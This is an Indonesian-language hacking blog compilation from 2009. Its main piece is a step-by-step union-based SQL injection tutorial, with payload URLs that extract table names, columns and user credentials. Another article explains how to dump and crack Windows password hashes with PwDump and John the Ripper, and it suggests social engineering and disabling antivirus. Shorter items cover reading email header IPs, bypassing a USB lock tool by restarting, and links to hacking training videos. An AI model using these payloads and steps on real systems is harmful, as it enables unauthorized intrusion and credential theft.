4 Langkah Mudah SQL injection

------------------------------------------------------

Author : ^k4c0n9^

Contact : mafiaexc@yahoo.com ==> http://WWW.MAHANATHAN.BLOGSPOT.COM

Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved

19/05/2009 02:45:00 WIB

------------------------------------------------------

dikutip dari : http://xshadow-power.com

Berikut saya akan menerangkan SQLinjection dengan 4 langkah.

Yang saya akan bahas disini bagaimana mencari/membaca table serta column dengan cepat… dengan query “group”

Concept:

1. mencari nomor togel
2. membaca table
3. membaca column table
4. result

teknik:

1. mencari nomor togel

saya rasa rekan-rekan sudah tau cara mencari nomer togel… jadi tidak usah saya bahas disini…

example:

http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

dan diketahui nomer togelnya sebagai berikut:

2. membaca table

berikut cara query “group” untuk membaca table

query yang digunakan sebagai berikut:

group_concat(table_name)

code diatas dimasukkan di salah satu nomer togel dan dibelakang url ditambahkan emblem berikut untuk membaca table dalam database:

+from+information_schema.tables+where+table_schema=database()--

Example:

http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4 5, group_concat(table_name),7,8,9,10,11,12+from+information_schema.tables+where+tables_chema=database()--

dimana query diatas dimasukkan di nomer togel 6

kemudian munculah table database secara berurutan sebagai berikut:

3. membaca column table

setelah didapatkan nama table, kita akan membaca column dari table yang kita dapat dengan query sebagai berikut:

group_concat(column_name)

dan emblem yang disertakan pada belakang url sebagai berikut ini:

+from+information_schema.columns+where+table_name=CODE EQUIVALENT HEX VALUE Table

Dimana “CODE EQUIVALENT HEX VALUE Table” didapatkan dari convert “STRING àEQUIVALENT HEX VALUE”

Dan saya biasa menggunakan tools berikut: http://xshadow-power.com/tools

Dan pada gambar sebelumnya… table yang akan kit baca columnya adalah “muser” dan telah didapatkan dari hasil confert dari muser adalah 0x6D75736572

Example:

http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4 5, group_concat(column_name),7,8,9,10,11,12 +from+information_schema.columns+where+table_name=0x6D75736572--

dan result yang didapatkan dari query ini sebagai berikut:

4. result

setelah mendapatkan apa yang kita cari pada langkah 2 & 3 diatas… sa’atnya membaca ISI dari column dari table muser yaitu “uid,pass”

query yang digunakan sebagai berikut:

concat_ws(nama column yang akan dibaca)

dan ditambahkan emblem dibelakang url sebagi berikut

+from+nama column table yang akan dibaca--

Example:

http://127.0.0.1/VULN.php?id=-1107+union+select+1,2,3,4,5,concat_ws(0x3a,uid,pwd),7,8,9,10,11,12+from+muser--

dan result dari yang kita baca diatas sebagai berikut:

Akhirnya selesai juga tutorialnya J

Sekian saja… terima kasih.

Cacian, makian, saran, kritik mohon dilayangkan ke email berikut: admin[at]cukdus[dot]org

Regard

Xshadow

No greetzz

Only thanks to:

Inc0mp13te, IndoUnderground, cyber_tomat, gblack, k0il, jack-, X-Code community, CukDu$ community, dan temen2 yang lupa namanya lom saya sebutkan hehehe…

Mengetahui IP Address Pengirim Email

------------------------------------------------------

Author : ^k4c0n9^

Contact : mafiaexc@yahoo.com ==> WWW.MAHANATHAN.BLOGSPOT.COM

Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved

18/05/2009 02:45:00 WIB

------------------------------------------------------

Saat Anda membaca email mungkin hanya terlihat informasi date, to, cc, bcc, subject dan message. Padahal setiap email yang terkirim pasti menyertakan informasi yang lengkap seperti message id, mailer, ip address, dan sebagainya.

Kalau Anda ingin mengetahui ip address pengirim email beserta isp yang digunakan Anda bisa membaca tips berikut ini.

Yahoo Mail:

1. Login ke Yahoo Mail.

2. Pilih salah satu email yang ingin Anda cek.

3. Klik pada menu atau link Full Header yang terletak di kanan bawah.

4. Cari tulisan “Received: from [...] by”.

5. Pada contoh di bawah ini IP addressnya adalah 61.94.152.147.

MS Outlook Express:

1. Buka program Outlook Express.

2. Klik kanan pada salah satu email yang ingin Anda cek.

3. Klik menu Properties.

4. Klik tab Detail.

HACK WINDOWS XP SP2

------------------------------------------------------

Author : ^k4c0n9^

Contact : mafiaexc@yahoo.com ==> WWW.MAHANATHAN.BLOGSPOT.COM

Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved

28/11/2006 02:45:00 WIB

------------------------------------------------------

Hai…….semua ???? disini kami akan menyajikan bagaimana untuk melihat password admin dan user dari OS Windows SP2……………dengan menggunakan PwDump dan John The Ripper ,,,,,,,,,,,,,,,,,,,,,,,,ini adalah artikel perdanaq jadi untuk yang sudah tahu diharamkan membaca lebih lanjut karena akan berdampak pada kesehatan mata anda…….he3x,,,,,,,,,,,,,,,,,,,n’ aq juga berterima kasih kepada temen2 dari YF Regional Probolinggo yang sudah mengadakan “Seminar Hacking Windows SP2” sehingga kami bisa menularkan ilmu yang telah kami dapat dari seminar itu khususnya buat Phy_cole, stressdesign, dan kawan2 yang lain………………………..Cogito ergo sum !!!!!

------------------------------------------------------------------------------------------------------------

Oke biar tidak terlau lama dan bertele-tele marilah kita mulai petualangan kita dengan penuh rasa deg-degan (maaf terlalu serius sampe’2 deg-degan),

Sebelum kita mulai berpetualang siapkan dulu :

1. Alat yang akan dipakai (PwDump & John The Ripper)
2. Bacalah basmalah sebelum memulai biar gak ada setan yang mengganggu
3. Peralatan ini hanya bisa di install di user yang tidak limited, jadi jika anda berda pada user yang accountnya limited gunakan social engginering agar kita bisa mengakses peralatan tersebut
4. Jika ada anti virus yang aktif langsung di disable saja biar tidak mengganggu
5. Jangan lupa camilannya juga atau rokok…….pokoknya yang bisa kamu nikmati deh…………………….

------------------------------------------------------------------------------------------------------------

Setelah kita siap semua mari kita mulai petualangan kita ! let’s go……..!!!!!>>>>>>>>

1. Pertama kita buka dulu command prompt dengan perintah windows+R, lalu kita akan masuk pada kotak dialog run terus kita masukkan cmd,,,tekan enter……

2. Setelah itu akan tampil kotak dialog command prompt atau kami biasa menyebutnya DOS………….disitu kita jalankan peralatan pertama kita yaitu PwDump……..pada command prompt kita masukkan untuk pindah ke directori di mana kita menyimpan file PwDump

3. Setelah kita masuk di directori file PwDump kita masuk pada PwDumpRelease(sekadar catatan * untuk file PwDump yang masih dalam keadaan terkompres harap di extract terlebih dahulu), setelah itu ketikkan perintah ini PwDump.exe -o pass.txt 127.0.0.1, tekan enter………………. Setelah itu kita akan mendapat pemberitahuan di akhir process “The command completed Succesfully”

4. Setelah itu kita buka explorer kita masuk pada file PwDump, terus masuk pada PwDumpRelease, setelah itu kita copy file pass.txt yang sudah terisi dengan password yang ter-enkripsi ke John The Ripper pada file RUN lalu paste……….

5. setelah itu kita masuk lagi pada command prompt…………..kita mulai meng-enkripsi file password yang telah kita dapatkan………di DOS kita masuk pada directory John The Ripper lalu John1701, lalu masuk pada file RUN…….kita jalankan John-386.Com untuk meng-enkrip file password kita dengan perintah John-386.com pass.txt lalu tekan enter …………………….

6. ya udah kita tunggu saja sampai semua file password yang kita dapatkan ter-enkrip semua………………………

udah dulu ya sampai sini dulu coz aq dah ngantuk nih !!!! sampai ketemu di artikel selanjutnya………. Semoga artikel ini bermanfaat bagi kalian……!!!! Bye…..BY3……

Note : Kami tidak bertanggung jawab atas semua masalah yang akan terjadi, kami hanya ingin berbagi ilmu pada sohib – sohib semua !!!!!!

PENGGUNAAN & CARA LOLOS DARI PROGRAM YF –KeyInMyFD vers.1.0 (Mengunci Komputer Dengan USB Flash Disk)

------------------------------------------------------
Author : ^inj3ct^
Contact : mafiaexc@yahoo.com ==> WWW.MAHANATHAN.BLOGSPOT.COM
Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved
10/05/2009 02:45:00 WIB
------------------------------------------------------
Deskripsi program :
Key In My Hand adalah program pengunci komputer dengan
USB Flash Disk sebagai media.

Program ini bisa mencegah komputer anda dari akses fisik
user yang tidak diperbolehkan.

Cara menjalankan :
Program ini dijalankan dalam USb flash-disk kita dengan cara :
1. MENGUNCI KOMPUTER
Buka aplikasi ini, Klik “Find USB Flash Disk” untuk mencari path dimana USB berada pada computer kita, jika anda semua sudah tahu maka hal ini tidak perlu dilakukan……langsung ketikkan path dimana USB berda misal ; g:
Setelah Itu klik define, dimana anda diminta untuk menyimpan file kunci untuk membuka computer yang sudah di-lock.
Disini saya menyimpannya dengan nama yf.YFPCLOCK (anda bisa menggantinya dengan nama anda sendiri), lalu setelah itu klik save untuk menyimpannya pada USB kita, dan klik accept maka akan tampil kotak dialog lalu pilih OK, disini anda sudah bisa mengunci layar computer……..proses akan berjalan di belakang layar klik “LOCK” untuk mengunci dan cabutlah USB anda……………………….dan…….jreng ……….. semuanya tidak berfungsi…….mouse yang tidak bisa dijalankan dan tombol start yang hilang …………

2. Membuka kunci
Kita tadi telah mengunci komputer kita, nah sekarang bagaimana caranya untuk membukanya ? gampang kugh………tinggal kita colokin USB kita dan…….semua telah berfungsi sebagaimana mestinya………….GOOD Luck yo………..!!!!!!


CARA LOLOSNYA GIMANA ?
Nah ini nih yang akan aku bahas menurut pengalamanku tapi sebelumnya aku ingin cerita gimana pertamanya aku nemuin cara ini…………….:

Waktu itu aku baca majalahnya X-Code yang ke-12 dan aku cobain program ini pertamanya aku cumin ngerti sedikit dari artikelnya…………karena disana gak diterangin filenya disimpan dimana (ato mungkin akunya za yang gak ngelihat) “sorry ya lo aq gak ngelihat coz aq cuman manusia biasa yang gak luput dari kesalan dan khlilaf” setelah aku ikuti petunjuknya maka aku simpan di dirve d: tapi koq gak da reaksinya ya ?
Setelah itu aq hapus lalu ternyata layar jadi terkunci……^%^ waduh bingung nih lalu aq restart aza komputernya eh….ternyata setelah masuk ke windows udah gak terkunci lagi……..syukur gue kalo gak bisa terbuka ntar aku dimarahin ama ortuq coz itu komputernya ortuq bukan punya Q …..............ya udah setelah itu aku simpan di USB ku file kuncinya dan ternyata aq bisa untuk ngunci dan membukanya ……….

Maaf k-lo artikel nie hanya membuat kakak-kakak dan kawan2 jadi boring karena cara bukanya cuman di-restart aja tapi semoga aza bisa menambah ilmu pengetahuan kita…..untuk yang mau minta programnya silahkan request ke : mafiaexc@yahoo.com

Video Hacking

Maraknya video hacking yang bertebaran secara gratis akan membuat ilmu kita semakin bertambah. disini kami menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. :D---- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.

Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing - cd 1 - 250 mb

http://rapidshare.com/files/6870957/traininga.part1.rar.html

http://rapidshare.com/files/6875509/traininga.part2.rar.html

http://rapidshare.com/files/6880184/traininga.part3.rar.html

http://rapidshare.com/files/6884786/traininga.part4.rar.html

http://rapidshare.com/files/6889797/traininga.part5.rar.html

http://rapidshare.com/files/6890170/traininga.part6.rar.html

------------------------------------------------------------

-Training Module 2 Footprinting and Reconnaissance - cd 2 - 210 mb

http://rapidshare.com/files/6920123/trainingb.part1.rar.html

http://rapidshare.com/files/6925380/trainingb.part2.rar.html

http://rapidshare.com/files/6930474/trainingb.part3.rar.html

http://rapidshare.com/files/6935598/trainingb.part4.rar.html

http://rapidshare.com/files/6937268/trainingb.part5.rar.html

------------------------------------------------------------

-Training Module 3 TCP IP Basics and Scanning - cd 3 - 153 mb

http://rapidshare.com/files/6950222/trainingc.part1.rar.html

http://rapidshare.com/files/6954540/trainingc.part2.rar.html

http://rapidshare.com/files/6958405/trainingc.part3.rar.html

http://rapidshare.com/files/6958651/trainingc.part4.rar.html

------------------------------------------------------------

-Training Module 4 Enumeration and Verification - cd 4 - 200 mb

http://rapidshare.com/files/6995889/trainingd.part1.rar.html

http://rapidshare.com/files/6999123/trainingd.part2.rar.html

http://rapidshare.com/files/7002551/trainingd.part3.rar.html

http://rapidshare.com/files/7005909/trainingd.part4.rar.html

http://rapidshare.com/files/7006074/trainingd.part5.rar.html

------------------------------------------------------------

-Training Module 5 Hacking Defending Wireless Modems - cd 5 - 94 mb

http://rapidshare.com/files/7017480/traininge.part1.rar.html

http://rapidshare.com/files/7021255/traininge.part2.rar.html

------------------------------------------------------------

-Training Module 6 Hacking Defending Web Servers - cd 6 - 150 mb

http://rapidshare.com/files/7029199/trainingf.part1.rar.html

http://rapidshare.com/files/7034545/trainingf.part2.rar.html

http://rapidshare.com/files/7039580/trainingf.part3.rar.html

http://rapidshare.com/files/7040200/trainingf.part4.rar.html

------------------------------------------------------------

-Training Module 7 Hacking Defending Web Applications - cd 7 - 110 mb

http://rapidshare.com/files/7049302/trainingg.part1.rar.html

http://rapidshare.com/files/7054559/trainingg.part2.rar.html

http://rapidshare.com/files/7056051/trainingg.part3.rar.html

------------------------------------------------------------

-Training Module 8 Sniffers and Session Hijacking - cd 8 - 115 mb

http://rapidshare.com/files/7069844/trainingh.part1.rar.html

http://rapidshare.com/files/7076146/trainingh.part2.rar.html

http://rapidshare.com/files/7084439/trainingh.part3.rar.html

------------------------------------------------------------

-Training Module 9 Hacking Defending Windows Systems - cd 9 - 120 mb

http://rapidshare.com/files/7090868/trainingi.part1.rar.html

http://rapidshare.com/files/7095821/trainingi.part2.rar.html

http://rapidshare.com/files/7097885/trainingi.part3.rar.html

------------------------------------------------------------

-Training Module 10 Hacking Defending Unix Systems - cd 10 - 150 mb

http://rapidshare.com/files/7136591/trainingJ.part1.rar.html

http://rapidshare.com/files/7139658/trainingJ.part2.rar.html

http://rapidshare.com/files/7142501/trainingJ.part3.rar.html

------------------------------------------------------------

-Training Module 11 Rootkits Backdoors Trojans Tunnels - cd 11 - 115 mb

http://rapidshare.com/files/7147118/trainingk.part1.rar.html

http://rapidshare.com/files/7159091/trainingk.part2.rar.html

http://rapidshare.com/files/7160611/trainingk.part3.rar.html

------------------------------------------------------------

-Training Module 12 Denial of Service and Botnets - cd 12 - 100 mb

http://rapidshare.com/files/7182977/trainingL.part1.rar.html

http://rapidshare.com/files/7187533/trainingL.part2.rar.html

------------------------------------------------------------

-Training Module 13 Automated Pen Testing Tools - cd 13 - 102 mb

http://rapidshare.com/files/7202752/trainingm.part1.rar.html

http://rapidshare.com/files/7208149/trainingm.part2.rar.html

http://rapidshare.com/files/7208549/trainingm.part3.rar.html

------------------------------------------------------------

-Training Module 14 Intrusion Detection Systems - cd 14 - 140 mb

http://rapidshare.com/files/7224433/trainingn.part1.rar.html

http://rapidshare.com/files/7230417/trainingn.part2.rar.html

http://rapidshare.com/files/7234950/trainingn.part3.rar.html

------------------------------------------------------------

-Training Module 15 Firewalls - cd 15 - 160 mb

http://rapidshare.com/files/7252545/trainingo.part1.rar.html

http://rapidshare.com/files/7255895/trainingo.part2.rar.html

http://rapidshare.com/files/7258850/trainingo.part3.rar.html

http://rapidshare.com/files/7259491/trainingo.part4.rar.html

-